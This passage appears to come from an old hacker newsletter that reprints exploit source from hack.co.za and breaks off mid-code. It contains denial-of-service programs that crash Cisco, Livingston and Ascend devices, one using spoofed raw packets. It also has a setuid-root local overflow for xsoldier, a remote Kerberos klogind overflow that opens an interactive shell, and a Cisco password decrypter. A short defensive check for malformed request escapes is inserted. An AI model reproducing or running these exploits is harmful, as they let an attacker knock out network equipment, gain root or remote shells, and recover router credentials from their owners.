#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
sigjmp_buf env;
u_long
resolve_host(u_char *host)
{
struct in_addr addr;
struct hostent *host_ent;
if ((addr.s_addr = inet_addr(host)) == -1)
{
host_ent = gethostbyname(host);
if (!host_ent) return((u_long)0);
memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);
}
return(addr.s_addr);
}
void
net_timeout(void)
{
alarm(0);
siglongjmp(env, 1);
}
int
nuke_cisco(u_long dst_ip)
{
struct sockaddr_in sin;
u_char crash[] = "GET /\%\%\n\n";
int sock;
alarm (0);
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock == -1)
{
perror("socket allocation");
exit(-1);
}
sin.sin_family = AF_INET;
sin.sin_port = htons(80);
sin.sin_addr.s_addr = dst_ip;
if (sigsetjmp(env, 1))
{
/* Timeout. */
close(sock);
return(-1);
}
alarm(TIMEOUT);
signal(SIGALRM, (void *)net_timeout);
if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) == -1)
{
close(sock);
return(-1);
}
alarm (0);
if (write(sock, crash, strlen(crash)) != strlen(crash))
{
close(sock);
fprintf(stderr, "\nWarning: truncated write()\n");
return(-1);
}
close(sock);
return(0);
}
int
main(int argc, char **argv)
{
FILE *filez;
struct in_addr addr;
u_long dst_ip = 0;
u_char host[255] = {0};
int nuked = 0, notnuked = 0;
if (argc != 2)
{
fprintf(stderr, "\nusage:\t%s ip_list\n\n", argv[0]);
exit(-1);
}
filez = fopen(argv[1], "r");
if (!filez)
{
fprintf(stderr, "Can't open IP address list file.\n");
exit(-1);
}
while (fgets(host, sizeof(host) - 1, filez) > 0)
{
host[strlen(host) - 1] = 0;
host[strlen(host) ] = 0;
dst_ip = resolve_host(host);
if (dst_ip)
{
#ifdef VERBOSE
addr.s_addr = dst_ip;
fprintf(stderr, "Resolved host `%s`, killing.. ", inet_ntoa(addr));
#endif /* VERBOSE */
if (!nuke_cisco(dst_ip))
{
#ifdef VERBOSE
fprintf(stderr, "success.\n");
nuked++;
#endif /* VERBOSE */
}
else
{
#ifdef VERBOSE
fprintf(stderr, "can't connect to TCP/80\n");
notnuked++;
#endif /* VERBOSE */
}
}
else
{
#ifdef VERBOSE
fprintf(stderr, "Can't resolve %s\n", host);
notnuked++;
#endif /* VERBOSE */
}
memset(host, 0, sizeof(host));
}
fprintf(stderr, "\nCompleted run:\n"
"Obtained a successful connection and sent crash: %d hosts.\n"
"No connection to port 80 or cannot resolve: %d hosts.\n\n",
nuked, notnuked);
exit(0);
}
/* EOF */
/* www.hack.co.za [19 May]*/
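Added example, not part of the original listing and not Cisco code: a check that a filtering proxy or log scanner in front of a management interface could use to flag request lines like the `GET /%%` above, where a `%` in the request target is not followed by two hex digits. Function names and the sample lines are constructed.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Locate the request target (the token after the method) in a request
 * line.  Returns NULL when the line has no space-separated target. */
static const char *request_target(const char *line, size_t *len)
{
    const char *sp = strchr(line, ' ');

    if (sp == NULL)
        return NULL;
    *len = strcspn(sp + 1, " \r\n");
    return sp + 1;
}

/* Return 1 if the request target contains a '%' that does not start a
 * well-formed %XX escape, 0 otherwise. */
int has_malformed_escape(const char *line)
{
    size_t len, i;
    const char *t = request_target(line, &len);

    if (t == NULL)
        return 0; /* nothing to inspect */
    for (i = 0; i < len; i++) {
        if (t[i] != '%')
            continue;
        /* Need two more characters inside the target, both hex digits. */
        if (len - i < 3 ||
            !isxdigit((unsigned char)t[i + 1]) ||
            !isxdigit((unsigned char)t[i + 2]))
            return 1;
        i += 2; /* skip the two hex digits just validated */
    }
    return 0;
}

/* Count the lines in a batch that should be rejected or alerted on. */
size_t count_flagged(const char *const *lines, size_t n)
{
    size_t i, hits = 0;

    for (i = 0; i < n; i++)
        hits += (size_t)has_malformed_escape(lines[i]);
    return hits;
}

/* Constructed sample request lines. */
const char *const SAMPLE_REQUESTS[] = {
    "GET /index.html HTTP/1.0\r\n", /* clean */
    "GET /%%\n\n",                  /* the request shown in the listing */
    "GET /a%20b HTTP/1.0\r\n",      /* valid escape */
    "GET /a%2 HTTP/1.0\r\n",        /* escape cut short */
    "GET /%zz HTTP/1.0\r\n",        /* non-hex escape */
    "GET /ok HTTP/1.0 %%\r\n"       /* '%' outside the target is ignored */
};
```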
@HWA
250.0 [IND] xsol-x.c mandrake 7.0 local overflow by lwc.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
lwc@vapid.dhs.org
/*Larry W. Cashdollar linux xsolider exploit.
*lwc@vapid.dhs.org http://vapid.dhs.org
*if xsolider is built and installed from its source it will be installed
*setuid root in /usr/local/games
*original exploit found by brock tellier for freebsd 3.3 ports packages.
*If a setregid() call is placed in the shellcode, you can get egid=12
*with the default mandrake installation.*/
#include <stdio.h>
#include <stdlib.h>
#define NOP 0x90 /*no operation skip to next instruction. */
#define LEN 4480 /*our buffersize. */
char shellcode[] = /*execve with setreuid(0,0) and no '/' hellkit v1.1 */
"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa"
"\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01"
"\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11"
"\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9"
"\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01"
"\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c"
"\xc2\x91";
/*Nab the stack pointer to use as an index into our nop's*/
long
get_sp ()
{
__asm__ ("mov %esp, %eax");
}
int
main (int argc, char *argv[])
{
char buffer[LEN];
int i, offset;
long retaddr = get_sp ();
if (argc <= 1)
offset = 0;
else
offset = atoi (argv[1]);
/*#Copy the NOPs in to the buffer leaving space for shellcode and
#pointers*/
for (i = 0; i < (LEN - strlen (shellcode) - 100); i++)
*(buffer + i) = NOP;
/*[NNNNNNNNNNNNNNNNNNNNN ]*/
/* ^-- LEN -(strlen(shellcode)) - 35*/
/*#Copy the shell code into the buffer*/
memcpy (buffer + i, shellcode, strlen (shellcode));
/*[NNNNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSS ]*/
/* ^-(buffer+i) */
/*#Fill the buffer with our new address to jump to esp + offset */
for (i = i + strlen (shellcode); i < LEN; i += 4)
*(long *) &buffer[i] = retaddr+offset;
/*[NNNNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSSRRRRRRRRRRRRR]*/
/* ^-(i+strlen(shellcode))*/
printf ("Jumping to address %x BufSize %d\n", retaddr + offset, LEN);
execl ("/usr/local/games/xsoldier", "xsoldier", "-display", buffer, 0);
}
/* www.hack.co.za [19 May]*/
@HWA
251.0 [IND] klogind.c bsdi 4.0.1 remote overflow by duke.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
duke@viper.net.au
/*
klogin remote buffer overflow
by duke (duke@viper.net.au)
tested on BSDI 4.0.1 klogin.
The bug is actually in the kerberos library so this
affects all kerb services (kerbIV). This code should need
minimal (if any) modification to use on other kerberos services.
it will only work if the file /etc/kerberosIV/krb.conf exists.
-duke
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/select.h>
#include <netinet/in.h>
#define RET 0x8047830
#define NOPLEN 900
#define MAX(x, y) ((x > y) ? x : y)
char bsdi_shell[]=
"\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76"
"\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07"
"\xff\xe8\xdc\xff\xff\xff/bin/sh\x00";
void usage(char *);
void shell(int);
char *make_data(void);
int offset=0;
int main(int argc, char **argv)
{
int sockfd, port=543, c;
char *pkt, buf[1024];
struct sockaddr_in sin;
struct hostent *hp;
while((c = getopt(argc, argv, "p:o:")) != EOF){
switch(c){
case 'p': port = atoi(optarg); break;
case 'o': offset = atoi(optarg); break;
default: usage(argv[0]);
}
}
if(!argv[optind])
usage(argv[0]);
if((hp = gethostbyname(argv[optind])) == NULL){
fprintf(stderr, "can't resolve host\n");
exit(-1);
}
pkt = make_data();
bzero(&sin, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = htons(port);
sin.sin_addr = *((struct in_addr *)hp->h_addr_list[0]);
if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket");
exit(-1);
}
if(connect(sockfd, (struct sockaddr *)&sin, sizeof(sin)) < 0){
perror("connect");
exit(-1);
}
write(sockfd, pkt, 1221);
free(pkt);
shell(sockfd);
}
void usage(char *p)
{
fprintf(stderr, "usage: %s [ -p port ] [ -o offset ] <hostname>\n", p);
fprintf(stderr, "-p: port to use\n");
fprintf(stderr, "-o: offset\n");
exit(0);
}
char *make_data(void)
{
char *tmp, *ptr;
int i;
if((tmp=(char *)calloc(1250, sizeof(char))) == NULL){
perror("calloc");
exit(-1);
}
ptr = tmp;
*ptr++ = 0x00;
memcpy(ptr, "AUTHV0.1", 8);
ptr+=8;
for(i=0; i<8; i++)
*ptr++ = 0x41;
*(unsigned long *)ptr = htonl(1200);
ptr+=4;
*(unsigned int *)ptr++ = 4;
*ptr++ = 8;
*ptr++ = 1;
for(i=0; i < 600; i+=4)
*(long *)&ptr[i] = RET + offset;
memset(ptr+300, 0x90, NOPLEN);
memcpy(ptr+800, bsdi_shell,
sizeof(bsdi_shell));
*(ptr+1000) = 0x00;
return(tmp);
}
void shell(int sock)
{
fd_set rset;
char bu[1024];
write(sock, "cd /; id; pwd; uname -a;\n", 25);
FD_ZERO(&rset);
for(;;){
FD_SET(fileno(stdin), &rset);
FD_SET(sock, &rset);
if(select(MAX(sock, fileno(stdin))+1, &rset, NULL, NULL, NULL) < 0){
perror("select");
exit(-1);
}
if(FD_ISSET(sock, &rset)){
char buf[1024];
int n;
bzero(buf, sizeof(buf));
n = read(sock, buf, sizeof(buf)-1);
if(n == 0){
printf("EOF from server\n");
exit(0);
}
if(n < 0){
perror("read");
exit(-1);
} else {
write(1, buf, n);
}
}
if(FD_ISSET(fileno(stdin), &rset)){
char buf[1024];
bzero(buf, sizeof(buf));
if(fgets(buf, sizeof(buf)-4, stdin) == NULL){
printf("OK. Quitting\n");
close(sock);
exit(0);
}
strcat(buf, "\n");
if(write(sock, buf, strlen(buf)) < 0){
perror("write");
exit(0);
}
}
}
}
/* www.hack.co.za [19 May]*/
@HWA
252.0 [IND] pmcrash.c router/livingston remote dos attack.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* The following code will crash ANY Livingston PortMaster.
It telnets to the portmaster and overflows its buffers.
Thanks to 'The Doc' for this one. */
/* pmcrash - note this'll work much faster if all your arguments
are IP addresses.. mainly because I didn't feel like
coding a structure to keep track of all the resolved
names.. so write a script to resolve your list of
names first, then provide those as arguments */
/* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
*/
/* Compiling instructions:
Linux:
gcc -O2 -fomit-frame-pounter -s -o pmfinger pmfinger.c
Solaris 2.4:
cc -O -s -o pmfinger pmfinger.c -lsocket -lnsl -lresolv -lucb
*/
#include <sys/time.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <signal.h>
#include <errno.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <pwd.h>
#ifndef sys_errlist
extern char *sys_errlist[];
#endif
#ifndef errno
extern int errno;
#endif
/* Inet sockets :-) */
int num=0;
int socks[250];
/* show sessions flag */
unsigned short int showflag=0;
char *
mystrerror(int err) {
return(sys_errlist[err]);
}
void
exitprog(void) {
while(num--) {
shutdown(socks[num-1],0);
close(socks[num-1]);
}
exit(0);
}
unsigned long int
resolver(host)
char *host;
{
unsigned long int ip=0L;
if(host && *host && (ip=inet_addr(host))==-1) {
struct hostent *he;
if(!(he=gethostbyname((char *)host)))
ip=0L;
else
ip=*(unsigned long *)he->h_addr_list[0];
}
return(ip);
}
void
usage(void) {
puts("pmcrash v0.2a - ComOS System Rebooter :-)\n"
"Copyright (C) 1995 LAME Communications\n"
"Written by Dr. Delete, Ph.D.\n\n"
"Usage: pmcrash <portmaster>[:port] [<portmaster>[:port] ... ]\n");
exit(0);
}
void
main(int argc,char *argv[]) {
unsigned short int port=0,x=1;
struct sockaddr_in server;
char crash[] = { 0xFF,0xF3,0xFF,0xF3,0xFF,0xF3,0xFF,0xF3,0xFF,0xF3 };
char *temp;
if(argc<2)
usage();
signal(SIGPIPE,(void (*)())exitprog);
signal(SIGHUP,(void (*)())exitprog);
signal(SIGINT,(void (*)())exitprog);
signal(SIGTERM,(void (*)())exitprog);
signal(SIGBUS,(void (*)())exitprog);
signal(SIGABRT,(void (*)())exitprog);
signal(SIGSEGV,(void (*)())exitprog);
server.sin_family=AF_INET;
printf("\nConnecting..."); fflush(stdout);
for(;x<argc;x++) {
if((socks[num]=socket(AF_INET,SOCK_STREAM,0))==-1) {
fprintf(stderr,"Unable to allocate AF_INET socket: %s\n",mystrerror(errno));
exitprog();
}
setsockopt(socks[num],SOL_SOCKET,SO_LINGER,0,0);
setsockopt(socks[num],SOL_SOCKET,SO_REUSEADDR,0,0);
setsockopt(socks[num],SOL_SOCKET,SO_KEEPALIVE,0,0);
if((temp=strstr(argv[x],":"))) {
*temp++=(char)0;
server.sin_port=htons((atoi(temp)));
}
else
server.sin_port=htons(23);
if(!(server.sin_addr.s_addr = resolver(argv[x]))) {
fprintf(stderr,"Unable to resolve host '%s'.\n",argv[x]);
close(socks[num]);
continue;
}
if(connect(socks[num],(struct sockaddr *)&server,sizeof(struct sockaddr_in))) {
printf("!"); fflush(stdout);
/* fprintf(stderr,"Unable to connect to %s. (%s)\n",argv[x],mystrerror(errno)); */
close(socks[num]);
continue;
}
printf("."); fflush(stdout);
num++;
}
printf("\nSweeping..."); fflush(stdout);
for(x=0;x<num;x++) {
write(socks[x],crash,10);
printf("."); fflush(stdout);
}
puts("\n");
sleep(4);
exitprog();
}
/* www.hack.co.za [19 May]*/
@HWA
253.0 [IND] cisco-connect.c cisco dos attack by tiz.telesup.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* Cisco 760 Series Connection Overflow
*
*
* Written by: Tiz.Telesup
* Affected Systems: Routers Cisco 760 Series, I haven't tested any more
* Tested on: FreeBSD 4.0 and Linux RedHat 6.0
*/
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <net/if.h>
#include <netinet/in.h>
#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
int net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, char *sourceip,
unsigned short int sourceport, int sec);
void net_write (int fd, const char *str, ...);
unsigned long int net_resolve (char *host);
void
usage (void)
{
printf ("usage: ./cisco host times\n");
exit (EXIT_FAILURE);
}
int
main (int argc, char *argv[])
{
char host[256];
int port,times,count,sd = 0;
int m = 0;
struct sockaddr_in cs;
printf ("Cisco 760 series Connection Overflow.\n");
printf ("-------------------------------------\n");
if (argc < 3)
usage();
strcpy (host, argv[1]);
times=atoi (argv[2]);
if ((times < 1) || (times > 10000)) /*Maximum number of connections*/
usage();
port =23; /* This might be changed to the telnet port of the router*/
printf ("Host: %s Times: %d\n", host, times);
for (count=0;count<times;count++){
printf ("Connecting... Connection number %d \n",count);
fflush (stdout);
sd = net_connect (&cs, host, port, NULL, 0, 30);
if (sd < 1) {
printf ("failed!\n");
exit (EXIT_FAILURE);
}
net_write (sd, "AAAA\n\n");
}
exit (EXIT_SUCCESS);
}
int
net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, char *sourceip,
unsigned short int sourceport, int sec)
{
int n, len, error, flags;
int fd;
struct timeval tv;
fd_set rset, wset;
/* first allocate a socket */
cs->sin_family = AF_INET;
cs->sin_port = htons (port);
fd = socket (cs->sin_family, SOCK_STREAM, 0);
if (fd == -1)
return (-1);
if (!(cs->sin_addr.s_addr = net_resolve (server))) {
close (fd);
return (-1);
}
flags = fcntl (fd, F_GETFL, 0);
if (flags == -1) {
close (fd);
return (-1);
}
n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
if (n == -1) {
close (fd);
return (-1);
}
error = 0;
n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
if (n < 0) {
if (errno != EINPROGRESS) {
close (fd);
return (-1);
}
}
if (n == 0)
goto done;
FD_ZERO(&rset);
FD_ZERO(&wset);
FD_SET(fd, &rset);
FD_SET(fd, &wset);
tv.tv_sec = sec;
tv.tv_usec = 0;
n = select(fd + 1, &rset, &wset, NULL, &tv);
if (n == 0) {
close(fd);
errno = ETIMEDOUT;
return (-1);
}
if (n == -1)
return (-1);
if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
len = sizeof(error);
if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
errno = ETIMEDOUT;
return (-1);
}
if (error == 0) {
goto done;
} else {
errno = error;
return (-1);
}
}
} else
return (-1);
done:
n = fcntl(fd, F_SETFL, flags);
if (n == -1)
return (-1);
return (fd);
}
unsigned long int
net_resolve (char *host)
{
long i;
struct hostent *he;
i = inet_addr(host);
if (i == -1) {
he = gethostbyname(host);
if (he == NULL) {
return (0);
} else {
return (*(unsigned long *) he->h_addr);
}
}
return (i);
}
void
net_write (int fd, const char *str, ...)
{
char tmp[8192];
va_list vl;
int i;
va_start(vl, str);
memset(tmp, 0, sizeof(tmp));
i = vsnprintf(tmp, sizeof(tmp), str, vl);
va_end(vl);
send(fd, tmp, i, 0);
return;
}
/* www.hack.co.za [19 May]*/
@HWA
254.0 [IND] ascend.c ascend remote dos attack by the posse.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
The Posse Brings you:
The Linux Ascend Kill Program!
Kill your local ISP (or even non-local)
313373133731337313373133731337313373133731337313373133731337313373133731337
1 3
3 1
3 Because Ascend has such a strong programming department that would 3
7 never under any circumstances release a version of their code which 3
3 contained a bug. 7
1 3
3 Well. Ascend did it again. Those pesky non zero length tcp offset's 1
3 do it everytime! Are those fault lights available in christmas colors 3
7 in time for the season? h0h0h0.. 3
3 7
1 BTW, if anyone has any pictures of MSN pops, please post them to 3
3 someplace public so we can all share in the season spirit. 1
3 3
7 - The Posse is back! 3
3 7
1 greetz to : alpha bits, the grave digger, and fast freddy. 3
3 1
3 Goto our eleet ftp sitez: 3
7 3
3 7
1 The Dark Dungeon 198.34.1xx.xxx 600 gigz online! 3
3 Strobe Room 34.101.1xx.xxx 1TB of Warez and H/P/V/A/C/K text 1
3 3
731337313373133731337313373133731337313373133731337313373133731337313373133
3 7
1 2600.com is run off vnetmax.villagenet.com (205.136.35.3) 3
3 Keep your support of 2600, help Emmanuel play with his little boys 1
3 3
731337313373133731337313373133731337313373133731337313373133731337313373133
3
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <netinet/protocols.h>
#include <netdb.h>
unsigned short compute_tcp_checksum(struct tcphdr *th, int len,
unsigned long saddr, unsigned long daddr)
{
unsigned long sum;
__asm__("
addl %%ecx, %%ebx
adcl %%edx, %%ebx
adcl $0, %%ebx
"
: "=b"(sum)
: "0"(daddr), "c"(saddr), "d"((ntohs(len) << 16) + IPPROTO_TCP*256)
: "bx", "cx", "dx" );
__asm__("
movl %%ecx, %%edx
cld
cmpl $32, %%ecx
jb 2f
shrl $5, %%ecx
clc
1: lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
loop 1b
adcl $0, %%ebx
movl %%edx, %%ecx
2: andl $28, %%ecx
je 4f
shrl $2, %%ecx
clc
3: lodsl
adcl %%eax, %%ebx
loop 3b
adcl $0, %%ebx
4: movl $0, %%eax
testw $2, %%dx
je 5f
lodsw
addl %%eax, %%ebx
adcl $0, %%ebx
movw $0, %%ax
5: test $1, %%edx
je 6f
lodsb
addl %%eax, %%ebx
adcl $0, %%ebx
6: movl %%ebx, %%eax
shrl $16, %%eax
addw %%ax, %%bx
adcw $0, %%bx
"
: "=b"(sum)
: "0"(sum), "c"(len), "S"(th)
: "ax", "bx", "cx", "dx", "si" );
return((~sum) & 0xffff);
}
#define psize ( sizeof(struct iphdr) + sizeof(struct tcphdr) )
#define tcp_offset ( sizeof(struct iphdr) )
#define err(x) { fprintf(stderr, x); exit(1); }
#define errors(x, y) { fprintf(stderr, x, y); exit(1); }
struct iphdr temp_ip;
int temp_socket = 0;
u_short
ip_checksum (u_short * buf, int nwords)
{
unsigned long sum;
for (sum = 0; nwords > 0; nwords--)
sum += *buf++;
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return ~sum;
}
void
fixhost (struct sockaddr_in *addr, char *hostname)
{
struct sockaddr_in *address;
struct hostent *host;
address = (struct sockaddr_in *) addr;
(void) bzero ((char *) address, sizeof (struct sockaddr_in));
address->sin_family = AF_INET;
address->sin_addr.s_addr = inet_addr (hostname);
if ((int) address->sin_addr.s_addr == -1)
{
host = gethostbyname (hostname);
if (host)
{
bcopy (host->h_addr, (char *) &address->sin_addr,
host->h_length);
}
else
{
puts ("Couldn't resolve address!!!");
exit (-1);
}
}
}
unsigned int
lookup (host)
char *host;
{
unsigned int addr;
struct hostent *he;
addr = inet_addr (host);
if (addr == -1)
{
he = gethostbyname (host);
if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))
return 0;
bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list));
}
return (addr);
}
unsigned short
lookup_port (p)
char *p;
{
int i;
struct servent *s;
if ((i = atoi (p)) == 0)
{
if ((s = getservbyname (p, "tcp")) == NULL)
errors ("Unknown port %s\n", p);
i = ntohs (s->s_port);
}
return ((unsigned short) i);
}
void
spoof_packet (struct sockaddr_in local, int fromport, \
struct sockaddr_in remote, int toport, ulong sequence, \
int sock, u_char theflag, ulong acknum, \
char *packdata, int datalen)
{
char *packet;
int tempint;
if (datalen > 0)
datalen++;
packet = (char *) malloc (psize + datalen);
tempint = toport;
toport = fromport;
fromport = tempint;
{
struct tcphdr *fake_tcp;
fake_tcp = (struct tcphdr *) (packet + tcp_offset);
fake_tcp->th_dport = htons (fromport);
fake_tcp->th_sport = htons (toport);
fake_tcp->th_flags = theflag;
fake_tcp->th_seq = random ();
fake_tcp->th_ack = random ();
/* this is what really matters, however we randomize everything else
to prevent simple rule based filters */
fake_tcp->th_off = random ();
fake_tcp->th_win = random ();
fake_tcp->th_urp = random ();
}
if (datalen > 0)
{
char *tempbuf;
tempbuf = (char *) (packet + tcp_offset + sizeof (struct tcphdr));
for (tempint = 0; tempint < datalen - 1; tempint++)
{
*tempbuf = *packdata;
*tempbuf++;
*packdata++;
}
*tempbuf = '\r';
}
{
struct iphdr *real_ip;
real_ip = (struct iphdr *) packet;
real_ip->version = 4;
real_ip->ihl = 5;
real_ip->tot_len = htons (psize + datalen);
real_ip->tos = 0;
real_ip->ttl = 64;
real_ip->protocol = 6;
real_ip->check = 0;
real_ip->id = 10786;
real_ip->frag_off = 0;
bcopy ((char *) &local.sin_addr, &real_ip->daddr, sizeof (real_ip->daddr));
bcopy ((char *) &remote.sin_addr, &real_ip->saddr, sizeof (real_ip->saddr));
temp_ip.saddr = htonl (ntohl (real_ip->daddr));
real_ip->daddr = htonl (ntohl (real_ip->saddr));
real_ip->saddr = temp_ip.saddr;
real_ip->check = ip_checksum ((u_short *) packet, sizeof (struct iphdr) >> 1);
{
struct tcphdr *another_tcp;
another_tcp = (struct tcphdr *) (packet + tcp_offset);
another_tcp->th_sum = 0;
another_tcp->th_sum = compute_tcp_checksum (another_tcp, sizeof (struct tcphdr) + datalen,
real_ip->saddr, real_ip->daddr);
}
}
{
int result;
sock = (int) temp_socket;
result = sendto (sock, packet, psize + datalen, 0,
(struct sockaddr *) &remote, sizeof (remote));
}
free (packet);
}
void
main (argc, argv)
int argc;
char **argv;
{
unsigned int daddr;
unsigned short dport;
struct sockaddr_in sin;
int s, i;
struct sockaddr_in local, remote;
u_long start_seq = 4935835 + getpid ();
if (argc != 3)
errors ("Usage: %s <dest_addr> <dest_port>\n\nDest port of 23 for Ascend units.\n",
argv[0]);
if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
err ("Unable to open raw socket.\n");
if ((temp_socket = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
err ("Unable to open raw socket.\n");
if (!(daddr = lookup (argv[1])))
err ("Unable to lookup destination address.\n");
dport = lookup_port (argv[2]);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = daddr;
sin.sin_port = dport;
fixhost ((struct sockaddr_in *)(struct sockaddr *) &local, argv[1]);
fixhost ((struct sockaddr_in *)(struct sockaddr *) &remote, argv[1]);
/* 500 seems to be enough to kill it */
for (i = 0; i < 500; i++)
{
start_seq++;
local.sin_addr.s_addr = random ();
spoof_packet (local, random (), remote, dport, start_seq, (int) s,
TH_SYN | TH_RST | TH_ACK, 0, NULL, 0);
}
}
/* www.hack.co.za [19 May]*/
@HWA
255.0 [IND] ciscocrack.c / ciscocrack.pl cisco password cracker.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
* Cisco password decrypter V2.0
* (c) 1995 by SPHiXe
*
* DISCLAIMER: The author of this program takes no responsibility for
* neither direct nor indirect damages caused by this program.
* Misuse of this program may lead to serious problems with
* your local authorities...
* You should know what you're doing.
*/
#include <stdio.h>
#include <stdlib.h>	/* exit() */
#include <string.h>	/* strlen(), strncmp() */
#include <ctype.h>
char xlat[] = {
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};
char pw_str1[] = "password 7 ";
char pw_str2[] = "enable-password 7 ";
char *pname;
cdecrypt(enc_pw, dec_pw)
char *enc_pw;
char *dec_pw;
{
unsigned int seed, i, val = 0;
if(strlen(enc_pw) & 1)
return(-1);
seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';
if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))
return(-1);
for (i = 2 ; i <= strlen(enc_pw); i++) {
if(i !=2 && !(i & 1)) {
dec_pw[i / 2 - 2] = val ^ xlat[seed++];
val = 0;
}
val *= 16;
if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {
val += enc_pw[i] - '0';
continue;
}
if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {
val += enc_pw[i] - 'A' + 10;
continue;
}
if(strlen(enc_pw) != i)
return(-1);
}
dec_pw[i / 2 - 1] = 0;	/* terminate directly after the last decoded byte */
return(0);
}
usage()
{
fprintf(stdout, "Usage: %s -p <encrypted password>\n", pname);
fprintf(stdout, " %s <router config file> <output file>\n", pname);
return(0);
}
main(argc,argv)
int argc;
char **argv;
{
FILE *in = stdin, *out = stdout;
char line[257];
char passwd[65];
unsigned int i, pw_pos;
pname = argv[0];
if(argc > 1)
{
if(argc > 3) {
usage();
exit(1);
}
if(argv[1][0] == '-')
{
switch(argv[1][1]) {
case 'h':
usage();
break;
case 'p':
if(cdecrypt(argv[2], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
fprintf(stdout, "password: %s\n", passwd);
break;
default:
fprintf(stderr, "%s: unknow option.", pname);
}
return(0);
}
if((in = fopen(argv[1], "rt")) == NULL)
exit(1);
if(argc > 2)
if((out = fopen(argv[2], "wt")) == NULL)
exit(1);
}
while(1) {
for(i = 0; i < 256; i++) {
if((line[i] = fgetc(in)) == EOF) {
if(i)
break;
fclose(in);
fclose(out);
return(0);
}
if(line[i] == '\r')
i--;
if(line[i] == '\n')
break;
}
pw_pos = 0;
line[i] = 0;
if(!strncmp(line, pw_str1, strlen(pw_str1)))
pw_pos = strlen(pw_str1);
if(!strncmp(line, pw_str2, strlen(pw_str2)))
